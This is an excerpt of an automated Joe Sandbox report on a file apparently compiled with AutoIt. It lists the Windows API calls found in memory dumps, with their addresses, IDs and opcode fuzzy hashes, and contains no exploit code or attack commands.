                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                        • String ID: 255.255.255.255
                        • API String ID: 946324512-2422070025
                        • Opcode ID: 6c2f71c9510aae49f6c3d38aaa2a82d38e2e133de297ee3aee945aadb3528b4c
                        • Instruction ID: b63b7ab4c1a28d079f260f7bd3f77169783fbd3594a0f15045c1865112225825
                        • Opcode Fuzzy Hash: 6c2f71c9510aae49f6c3d38aaa2a82d38e2e133de297ee3aee945aadb3528b4c
                        • Instruction Fuzzy Hash: F43104396042159FC712EF28C881EAA77E4EF1431CF258059EA168FB92CB32EE41C760
                        APIs
                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 003C4705
                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 003C4713
                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 003C471A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: MessageSend$DestroyWindow
                        • String ID: msctls_updown32
                        • API String ID: 4014797782-2298589950
                        • Opcode ID: 4950e1c918ff542e62966665ed615328c31da3d3713dd059de3cc1d48875d5fc
                        • Instruction ID: cfc68169a0acc532e8b678aa393162e86cd34f2a90ae0598d3fb2a8b6029c534
                        • Opcode Fuzzy Hash: 4950e1c918ff542e62966665ed615328c31da3d3713dd059de3cc1d48875d5fc
                        • Instruction Fuzzy Hash: E0213CB5600209AFDB12DF64DCD1EA737ADEB5A3A4B050059FA14DB361CB71EC61CB60
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: _wcslen
                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                        • API String ID: 176396367-2734436370
                        • Opcode ID: 2b59efab01058e728960f34614db7546d66df7558f5461933fa1ce409d622dde
                        • Instruction ID: 852d1bb2330312b9ce79dd4fe663ebd2cdac7eede3c81f5f8a4493415198c018
                        • Opcode Fuzzy Hash: 2b59efab01058e728960f34614db7546d66df7558f5461933fa1ce409d622dde
                        • Instruction Fuzzy Hash: 3521F67210451166DB33AB2C9802FB7B3AC9F52320F15402FF9499B151EB51AD85C3D5
                        APIs
                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 003C3840
                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 003C3850
                        • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 003C3876
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: MessageSend$MoveWindow
                        • String ID: Listbox
                        • API String ID: 3315199576-2633736733
                        • Opcode ID: 47636599bfc923a6812072b30dcd3a8048a68eebf535438b6c4eea88ff466787
                        • Instruction ID: 8a3823e25108a6dbbafb5654e828ce25abd8c37d4597314c1dcd2c4729c8d8ee
                        • Opcode Fuzzy Hash: 47636599bfc923a6812072b30dcd3a8048a68eebf535438b6c4eea88ff466787
                        • Instruction Fuzzy Hash: 4C218E72610218BFEB229F54DC85FBB376EEF89750F118128F9049B190C671ED528BA0
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 003A4A08
                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 003A4A5C
                        • SetErrorMode.KERNEL32(00000000,?,?,003CCC08), ref: 003A4AD0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ErrorMode$InformationVolume
                        • String ID: %lu
                        • API String ID: 2507767853-685833217
                        • Opcode ID: 442bf6131a261830d78864a5cc21ae1deda71ffeae45cd81c68b8e6860ef647d
                        • Instruction ID: db089c2daffb25a214d453c92d172efc047f42ec9a907c047d542da516fe3a89
                        • Opcode Fuzzy Hash: 442bf6131a261830d78864a5cc21ae1deda71ffeae45cd81c68b8e6860ef647d
                        • Instruction Fuzzy Hash: 33317171A00108AFDB12DF54C885EAA7BF8EF49308F1480A9F909DF252D771ED45CB61
                        APIs
                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 003C424F
                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 003C4264
                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 003C4271
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: MessageSend
                        • String ID: msctls_trackbar32
                        • API String ID: 3850602802-1010561917
                        • Opcode ID: 8fd18ca818e6ac25a93e15cd30182bcf49390dadbded13a5bcf79cb878ce14f2
                        • Instruction ID: c213343a34dd9f69a11cfb9ef99fd57bf5c7732f0140e35560399df522dae9a6
                        • Opcode Fuzzy Hash: 8fd18ca818e6ac25a93e15cd30182bcf49390dadbded13a5bcf79cb878ce14f2
                        • Instruction Fuzzy Hash: 87110632240208BEEF225F28CC46FAB7BACEF95B54F020528FA55E60A0D271DC619B10
                        APIs
                          • Part of subcall function 00336B57: _wcslen.LIBCMT ref: 00336B6A
                          • Part of subcall function 00392DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00392DC5
                          • Part of subcall function 00392DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00392DD6
                          • Part of subcall function 00392DA7: GetCurrentThreadId.KERNEL32 ref: 00392DDD
                          • Part of subcall function 00392DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00392DE4
                        • GetFocus.USER32 ref: 00392F78
                          • Part of subcall function 00392DEE: GetParent.USER32(00000000), ref: 00392DF9
                        • GetClassNameW.USER32(?,?,00000100), ref: 00392FC3
                        • EnumChildWindows.USER32(?,0039303B), ref: 00392FEB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                        • String ID: %s%d
                        • API String ID: 1272988791-1110647743
                        • Opcode ID: 0f1749d1a5c5d3131b9833cd770872354c3de9b9966bf75907c0d63dbff41b99
                        • Instruction ID: 96b47279452b40b812e9ec48536101cbe77568ce69f1a9b7a005ebf95e6073ec
                        • Opcode Fuzzy Hash: 0f1749d1a5c5d3131b9833cd770872354c3de9b9966bf75907c0d63dbff41b99
                        • Instruction Fuzzy Hash: 9E11B4B16002056BDF167F748CDAEEE776AAF84304F048075FA19DF252DE3099458B60
                        APIs
                        • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 003C58C1
                        • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 003C58EE
                        • DrawMenuBar.USER32(?), ref: 003C58FD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Menu$InfoItem$Draw
                        • String ID: 0
                        • API String ID: 3227129158-4108050209
                        • Opcode ID: d72f26315049f14707ebceb258784f1b19ced946a1fd346efb247ef2f4fa9f56
                        • Instruction ID: b9b48dc4dfb0c8c3492e903804067e42f98782618e34e2fe48aa2753977b34c0
                        • Opcode Fuzzy Hash: d72f26315049f14707ebceb258784f1b19ced946a1fd346efb247ef2f4fa9f56
                        • Instruction Fuzzy Hash: 39011B32510218EFDB229F12DC44FAEBBB8FB45361F148099E849DA151DB30AAD4DF21
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6ae21e96537805ad2d5cdff8e1f1d013085addd93cbb6fa200dde110e8059658
                        • Instruction ID: 7952a59a34b0024eb6c6425408a3a8e67312819ddd5da768460febf375a634dc
                        • Opcode Fuzzy Hash: 6ae21e96537805ad2d5cdff8e1f1d013085addd93cbb6fa200dde110e8059658
                        • Instruction Fuzzy Hash: D2C17D75A00216EFDB19CFA8C894EAEB7B5FF48704F218598E905EB251D731ED41CB90
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Variant$ClearInitInitializeUninitialize
                        • String ID:
                        • API String ID: 1998397398-0
                        • Opcode ID: 6b63e10b023f0e82c2cf8a8b854266a99e546d1565623409251a04724c41db76
                        • Instruction ID: 39a6339a694947cbd09cc88ae2cd981bb1cb12736947a94883cdea2589b973c1
                        • Opcode Fuzzy Hash: 6b63e10b023f0e82c2cf8a8b854266a99e546d1565623409251a04724c41db76
                        • Instruction Fuzzy Hash: EEA169756042109FDB16DF28C485A6AB7E4FF89714F048859FA8A9F762DB30EE01CB91
                        APIs
                        • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,003CFC08,?), ref: 003905F0
                        • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,003CFC08,?), ref: 00390608
                        • CLSIDFromProgID.OLE32(?,?,00000000,003CCC40,000000FF,?,00000000,00000800,00000000,?,003CFC08,?), ref: 0039062D
                        • _memcmp.LIBVCRUNTIME ref: 0039064E
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: FromProg$FreeTask_memcmp
                        • String ID:
                        • API String ID: 314563124-0
                        • Opcode ID: a30ef32ad6bd7fb85104252263d7dc0ac8a43f6c8eb903290f48e436199a26b6
                        • Instruction ID: 0287adb3b0a8273f18655b74248f4e2e641db73bac277d11af275b843eaba305
                        • Opcode Fuzzy Hash: a30ef32ad6bd7fb85104252263d7dc0ac8a43f6c8eb903290f48e436199a26b6
                        • Instruction Fuzzy Hash: 7E81F675A00209EFCF05DF94C984EEEB7B9FF89315F214598E506AB250DB71AE06CB60
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: _free
                        • String ID:
                        • API String ID: 269201875-0
                        • Opcode ID: b84fdce10d1dcad321e00ab847630717fe4d71d23673e7a102a4a0aad89472c3
                        • Instruction ID: 6041e57726239dbaba713a191d0e20426d6defc1c0e24752aac5c2629aff34e0
                        • Opcode Fuzzy Hash: b84fdce10d1dcad321e00ab847630717fe4d71d23673e7a102a4a0aad89472c3
                        • Instruction Fuzzy Hash: B6415C77A00100ABDB376BBE8C46AAE3AB9EF42370F15C625F81DDB191E67848419361
                        APIs
                        • GetWindowRect.USER32(014BEA18,?), ref: 003C62E2
                        • ScreenToClient.USER32(?,?), ref: 003C6315
                        • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 003C6382
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Window$ClientMoveRectScreen
                        • String ID:
                        • API String ID: 3880355969-0
                        • Opcode ID: a6c4caa13c92188a6ac2ad0df4a0ee7f031a9f50a77a94f12447b201b0524d0a
                        • Instruction ID: 4f229f8bb5c3152e83d1f8d0a09c0df0e7c9880e91dd02abd3c4c9fe36d8b9bf
                        • Opcode Fuzzy Hash: a6c4caa13c92188a6ac2ad0df4a0ee7f031a9f50a77a94f12447b201b0524d0a
                        • Instruction Fuzzy Hash: EA512874A00249AFCB12DF68D981EAE7BB5EB85360F11816DF815DB2A1D730ED81CB50
                        APIs
                        • socket.WSOCK32(00000002,00000002,00000011), ref: 003B1AFD
                        • WSAGetLastError.WSOCK32 ref: 003B1B0B
                        • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 003B1B8A
                        • WSAGetLastError.WSOCK32 ref: 003B1B94
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ErrorLast$socket
                        • String ID:
                        • API String ID: 1881357543-0
                        • Opcode ID: a72fa48615186b59f189936bf2c316f89373f2c531d6e7cfb210b72e89ccf3dc
                        • Instruction ID: 07ac6be2a5e29c12fe5d4e7674b787a493be236ba31983b77a861808f7381009
                        • Opcode Fuzzy Hash: a72fa48615186b59f189936bf2c316f89373f2c531d6e7cfb210b72e89ccf3dc
                        • Instruction Fuzzy Hash: 4441D074600200AFE722EF24C896F6A77E5AB44718F54C44CFA1A9F7D2D772ED418B90
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9a638526fe37b4432196e789eb32d7c35dc50707121ee435eec43fd61e11d368
                        • Instruction ID: 5d371bf01c63108c4d131a37dc13f0b10445012ff5e954affca1449b54e20483
                        • Opcode Fuzzy Hash: 9a638526fe37b4432196e789eb32d7c35dc50707121ee435eec43fd61e11d368
                        • Instruction Fuzzy Hash: 28413876A00314AFD727AF38CC41BAABBA9EF84710F10C52AF546DF692D77199418B80
                        APIs
                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 003A5783
                        • GetLastError.KERNEL32(?,00000000), ref: 003A57A9
                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 003A57CE
                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 003A57FA
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: CreateHardLink$DeleteErrorFileLast
                        • String ID:
                        • API String ID: 3321077145-0
                        • Opcode ID: 19a8504edf2f6c50d4cc1ac35020d059488f5fd39784ec14cb735979ac2962ec
                        • Instruction ID: 327de44f164d823fab64d5e995d4a68a861ff5bf2da3962d56f0585643aeb1d4
                        • Opcode Fuzzy Hash: 19a8504edf2f6c50d4cc1ac35020d059488f5fd39784ec14cb735979ac2962ec
                        • Instruction Fuzzy Hash: 3D411C3A600610DFDB26DF15C484A19BBE5EF4A720F198488E84AAF362CB35FD00CB91
                        APIs
                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00356D71,00000000,00000000,003582D9,?,003582D9,?,00000001,00356D71,?,00000001,003582D9,003582D9), ref: 0036D910
                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0036D999
                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0036D9AB
                        • __freea.LIBCMT ref: 0036D9B4
                          • Part of subcall function 00363820: RtlAllocateHeap.NTDLL(00000000,?,00401444,?,0034FDF5,?,?,0033A976,00000010,00401440,003313FC,?,003313C6,?,00331129), ref: 00363852
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                        • String ID:
                        • API String ID: 2652629310-0
                        • Opcode ID: c24c39175d5dffa5880bdb20348a379384826065f72090ec39f2548dc30fbdda
                        • Instruction ID: 8d628887c00fc4b98165a23cb6f0c892c5b4c72468bf6b198b5339dbb5599a8c
                        • Opcode Fuzzy Hash: c24c39175d5dffa5880bdb20348a379384826065f72090ec39f2548dc30fbdda
                        • Instruction Fuzzy Hash: 6431B072A0020AABDF269F65DC45EAF7BA9EB41310F068168FC04DB154EB35DD54CB90
                        APIs
                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 003C5352
                        • GetWindowLongW.USER32(?,000000F0), ref: 003C5375
                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 003C5382
                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 003C53A8
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: LongWindow$InvalidateMessageRectSend
                        • String ID:
                        • API String ID: 3340791633-0
                        • Opcode ID: 1380f4b4a5e77297b758dc1273bbfa58cf2a940b40f424be2b8ce9778ad232e3
                        • Instruction ID: 74c20a7524c8d86ffe04e95534d223d750b770a8b269ad625a114295bc856d78
                        • Opcode Fuzzy Hash: 1380f4b4a5e77297b758dc1273bbfa58cf2a940b40f424be2b8ce9778ad232e3
                        • Instruction Fuzzy Hash: 7931B038B55A88AFEB339E14CC45FE87769AB04390F59410AFA11D62E1C7B0BDC09B41
                        APIs
                        • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 0039ABF1
                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 0039AC0D
                        • PostMessageW.USER32(00000000,00000101,00000000), ref: 0039AC74
                        • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 0039ACC6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: KeyboardState$InputMessagePostSend
                        • String ID:
                        • API String ID: 432972143-0
                        • Opcode ID: e1c6819ac7d299b80c0e73a400b88580ae774e7473eb7648a0d936d82729d169
                        • Instruction ID: 21afedfea06e8f520edcd6008992c66a827fa43bb577a5806e30657b10680d71
                        • Opcode Fuzzy Hash: e1c6819ac7d299b80c0e73a400b88580ae774e7473eb7648a0d936d82729d169
                        • Instruction Fuzzy Hash: B1313970A04B186FFF37CB698C04BFA7BA9AB85311F04471AE485DA1D0C37499818BD2
                        APIs
                        • ClientToScreen.USER32(?,?), ref: 003C769A
                        • GetWindowRect.USER32(?,?), ref: 003C7710
                        • PtInRect.USER32(?,?,003C8B89), ref: 003C7720
                        • MessageBeep.USER32(00000000), ref: 003C778C
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
